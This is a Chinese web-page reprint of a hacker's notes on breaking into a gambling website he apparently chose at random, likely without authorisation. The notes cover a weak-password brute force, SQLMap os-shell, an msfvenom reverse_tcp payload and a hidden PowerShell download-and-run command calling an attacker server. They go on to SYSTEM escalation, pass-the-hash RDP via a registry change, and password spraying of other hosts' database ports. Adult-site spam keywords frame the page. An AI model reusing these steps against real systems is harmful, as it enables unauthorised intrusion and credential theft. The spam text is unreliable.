在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

某菠菜的滲透測試操作筆記

jf_hKIAo4na ? 來源:xz.aliyun ? 2024-01-04 15:54 ? 次閱讀

前言

閑著無聊,網(wǎng)上隨便找了一個(gè)菠菜進(jìn)行簡單測試,并做筆記記錄,大佬們輕噴,有什么不足之處請指教。

弱口令

訪問網(wǎng)站就是一個(gè)登錄頁面,沒有驗(yàn)證碼直接bp開啟,成功爆出弱口令admin/123456,直接進(jìn)入后臺。

7302f86c-a062-11ee-8b88-92fbcf53809c.png

sql注入獲取權(quán)限

翻看了很多功能點(diǎn),在一處功能點(diǎn)發(fā)現(xiàn)上傳接口,并嘗試上傳文件,發(fā)現(xiàn)無法上傳,加了白名單。直接選擇放棄,繼續(xù)尋找。在某一個(gè)/GroupMember.aspx?gid=參數(shù)上加上單引號,直接報(bào)錯(cuò),SQL注入這不就來了么。

73161bc2-a062-11ee-8b88-92fbcf53809c.png

說干就干,直接SQLMAP

73318f38-a062-11ee-8b88-92fbcf53809c.png

發(fā)現(xiàn)為MSSQL,且DBA權(quán)限,直接--os-shell

734610ca-a062-11ee-8b88-92fbcf53809c.png

上線msf

已經(jīng)獲取普通權(quán)限,接下來就是上線msf提權(quán)。msf生成powershell腳本,并放置在網(wǎng)站目錄下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1

73532ea4-a062-11ee-8b88-92fbcf53809c.png

Vps開啟監(jiān)聽

7359dc90-a062-11ee-8b88-92fbcf53809c.png

使用powershell上線session

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"

7361674e-a062-11ee-8b88-92fbcf53809c.png

如果想要通過url拼接堆疊執(zhí)行powershell會存在一個(gè)問題,就是單引號閉合問題。我們可以通過對powershell進(jìn)行編碼一下,這樣就可以繞過單引號的問題。下面推薦一個(gè)不錯(cuò)的網(wǎng)站。

https://r0yanx.com/tools/java_exec_encode/

提權(quán)

session已經(jīng)上線,接下來目標(biāo)就是獲取system權(quán)限。很幸運(yùn)直接getsystem可以獲取system權(quán)限。如果需要提權(quán)推薦土豆家族提權(quán),實(shí)戰(zhàn)中成功率很高,影響的服務(wù)器版本也很多。

73668378-a062-11ee-8b88-92fbcf53809c.png

遷移一下進(jìn)程,防止進(jìn)程掉線。

73861e72-a062-11ee-8b88-92fbcf53809c.png

遠(yuǎn)程登錄服務(wù)器

發(fā)現(xiàn)服務(wù)器開啟3389端口,因?yàn)槭莝ystem權(quán)限,且為2012系統(tǒng),大于2008版本都是無法抓到明文密碼,直接修改adminnistrator密碼。(實(shí)戰(zhàn)中不推薦直接修改管理員密碼)

739ff342-a062-11ee-8b88-92fbcf53809c.png

73b4aff8-a062-11ee-8b88-92fbcf53809c.png

利用hash遠(yuǎn)程登錄管理員賬號

因?yàn)槭莣in2012無法獲取明文密碼,直接修改管理員密碼稍有些不妥。嘗試通過獲取管理員NTLM遠(yuǎn)程登錄機(jī)器。(并非同一臺,這只是提供一個(gè)思路)

73b9c024-a062-11ee-8b88-92fbcf53809c.png

使用hash遠(yuǎn)程登錄RDP,需要開啟"Restricted Admin Mode"

// 開啟Restricted Admin mode
REG ADD "HKLMSystemCurrentControlSetControlLsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f


// 查看是否已開啟,0x0則表示開啟
REG query "HKLMSystemCurrentControlSetControlLsa" | findstr "DisableRestrictedAdmin"

73be3938-a062-11ee-8b88-92fbcf53809c.png

成功利用hash遠(yuǎn)程管理員桌面

73c3bb06-a062-11ee-8b88-92fbcf53809c.png

73c7ec9e-a062-11ee-8b88-92fbcf53809c.png

其他

前期發(fā)現(xiàn)1433端口開放著,尋找數(shù)據(jù)庫配置文件,登錄數(shù)據(jù)庫。

73d9a8bc-a062-11ee-8b88-92fbcf53809c.png

通過fofa找了一下,資產(chǎn)還是挺多的,且很多都開放1433端口,猜測會存在同一個(gè)人部署的網(wǎng)站,嘗試用獲取的密碼對這些資產(chǎn)的1433端口進(jìn)行爆破,成功撞到幾臺數(shù)據(jù)庫,且都是sa權(quán)限。結(jié)束。

73f24818-a062-11ee-8b88-92fbcf53809c.png

審核編輯:黃飛

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報(bào)投訴
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    12

    文章

    9308

    瀏覽量

    86072
  • SQL
    SQL
    +關(guān)注

    關(guān)注

    1

    文章

    775

    瀏覽量

    44254
  • 端口
    +關(guān)注

    關(guān)注

    4

    文章

    990

    瀏覽量

    32211

原文標(biāo)題:對某菠菜的滲透測試筆記

文章出處:【微信號:菜鳥學(xué)安全,微信公眾號:菜鳥學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    web滲透測試流程

      滲透測試是什么?網(wǎng)絡(luò)安全學(xué)習(xí)中,web滲透測試流程是怎樣的?后滲透的詳細(xì)步驟解析如何?  滲透
    發(fā)表于 01-29 17:27

    有色Petri網(wǎng)在滲透測試中的應(yīng)用

    滲透測試是常用的網(wǎng)絡(luò)安全保障方法。該文細(xì)化現(xiàn)有滲透測試過程,針對傳統(tǒng)滲透測試模型存在的不足提出一
    發(fā)表于 04-02 09:45 ?10次下載

    cad簡單操作

    cad實(shí)用操作筆記
    發(fā)表于 12-23 02:15 ?5次下載

    DXP 2004簡單操作

    DXP 2004實(shí)用操作筆記
    發(fā)表于 12-23 02:15 ?0次下載

    滲透測試工具開發(fā)

    滲透測試工具開發(fā)
    發(fā)表于 09-07 10:30 ?18次下載
    <b class='flag-5'>滲透</b><b class='flag-5'>測試</b>工具開發(fā)

    如何自己制作一個(gè)超聲波測距模塊詳細(xì)制作筆記資料免費(fèi)下載

    本文檔的主要內(nèi)容詳細(xì)介紹的是如何自己制作一個(gè)超聲波測距模塊詳細(xì)制作筆記資料免費(fèi)下載。
    發(fā)表于 05-29 17:56 ?9次下載
    如何自己制作一個(gè)超聲波測距模塊詳細(xì)制<b class='flag-5'>作筆記</b>資料免費(fèi)下載

    如何使用低消耗設(shè)備進(jìn)行破解和滲透測試的Deck操作模式資料說明

    的靈活性。操作員可以攜帶多個(gè)相同的Deck設(shè)備到達(dá)滲透測試地點(diǎn),現(xiàn)場酌情選擇合適的電源或其他選項(xiàng)(比如無線網(wǎng)卡、802.15.4貓等)。而不需要按照滲透
    發(fā)表于 05-09 18:15 ?0次下載

    嵌入式C語言的5個(gè)位操作筆記資料說明

    本文檔的主要內(nèi)容詳細(xì)介紹的是嵌入式C語言的5個(gè)位操作筆記資料說明。
    發(fā)表于 05-08 18:19 ?3次下載
    嵌入式C語言的5個(gè)位<b class='flag-5'>操作筆記</b>資料說明

    菠菜為燃料電池供電!大力水手成真!

    大力水手吃菠菜給自己補(bǔ)充能量的畫面,應(yīng)該是每一個(gè)愛吃菠菜的小朋友的英雄。 不過,菠菜的能量可不止在動畫片里,最近,菠菜真的能為燃料電池供電了! 這也令研究人員感到驚訝,美國
    的頭像 發(fā)表于 10-23 16:00 ?1842次閱讀

    基于STM32四軸飛控制作筆記

    這里寫自定義目錄標(biāo)題基于STM32四軸飛控制作筆記新的改變功能快捷鍵合理的創(chuàng)建標(biāo)題,有助于目錄的生成如何改變文本的樣式插入鏈接與圖片如何插入一段漂亮的代碼片生成一個(gè)適合你的列表創(chuàng)建一個(gè)表格設(shè)定內(nèi)容
    發(fā)表于 11-30 16:36 ?11次下載
    基于STM32四軸飛控制<b class='flag-5'>作筆記</b>

    白盒滲透測試的優(yōu)勢是什么

    滲透測試是一項(xiàng)重要的進(jìn)攻性安全演習(xí)或操作。如果執(zhí)行得當(dāng),它會極大地提高您組織的安全性。滲透測試分為三種類型,根據(jù)
    的頭像 發(fā)表于 09-19 10:04 ?1269次閱讀

    使用超聲波傳感器制作筆記本電腦觸摸板HCSR 04

    電子發(fā)燒友網(wǎng)站提供《使用超聲波傳感器制作筆記本電腦觸摸板HCSR 04.zip》資料免費(fèi)下載
    發(fā)表于 10-31 09:58 ?0次下載
    使用超聲波傳感器制<b class='flag-5'>作筆記</b>本電腦觸摸板HCSR 04

    滲透測試和邊緣

    滲透測試和邊緣
    的頭像 發(fā)表于 01-03 09:45 ?650次閱讀
    <b class='flag-5'>滲透</b><b class='flag-5'>測試</b>和邊緣

    11款專家級滲透測試工具

    回顧過去,黑客入侵異常困難,需要大量手動操作。然而,如今,一整套自動化測試工具讓黑客變成了“半機(jī)械人”,能夠比以往任何時(shí)候都進(jìn)行更多的測試。以下11款專家級滲透
    的頭像 發(fā)表于 03-07 10:51 ?3462次閱讀

    如何使用DudeSuite進(jìn)行滲透測試工作

    Dude Suite 是一款集成化的Web滲透測試工具集,包含了Web滲透測試活動中使用頻率非常高的功能,可以幫助我們高效地完成對Web應(yīng)用程序的
    的頭像 發(fā)表于 06-13 09:04 ?1721次閱讀
    如何使用DudeSuite進(jìn)行<b class='flag-5'>滲透</b><b class='flag-5'>測試</b>工作
    主站蜘蛛池模板: 国产a一级毛片午夜剧场14 | 亚洲综合五月天婷 | 免费操人视频 | 俄罗斯久久 | 国产经典三级在线 | 伊人狼人综合网 | 色婷婷综合久久久 | 最近的中文字幕免费动漫视频 | 97国产精品人人爽人人做 | 天天影视网天天影网 | 婷婷亚洲五月琪琪综合 | 伊人网成人| 成人伊人电影 | 黄色小视频日本 | 1024手机在线观看视频 | 日日插夜夜爽 | 福利片欧美 | 五月婷婷丁香综合 | 成人国产精品高清在线观看 | 午夜看片在线观看 | 特黄特色大片免费播放器9 特黄特色大片免费视频播放 | 日本一区二区在线不卡 | 国产精品麻豆va在线播放 | 免费人成在线观看网站品爱网日本 | 国产超爽人人爽人人做 | 看真人一级毛片 | 欧美性色xo影院永久禁欲 | 都市激情亚洲综合 | 国产一区中文字幕在线观看 | 天天夜夜久久 | 手机看片日韩高清1024 | 中出丰满大乳中文字幕 | 色综合天天射 | 日夜操在线视频 | 性色网址 | 色91在线| 欧美成人在线影院 | 国产精品嫩草影院午夜 | 亚洲欧洲无码一区二区三区 | 拍拍拍美女黄色1000视频 | 精品香港经典三级在线看 |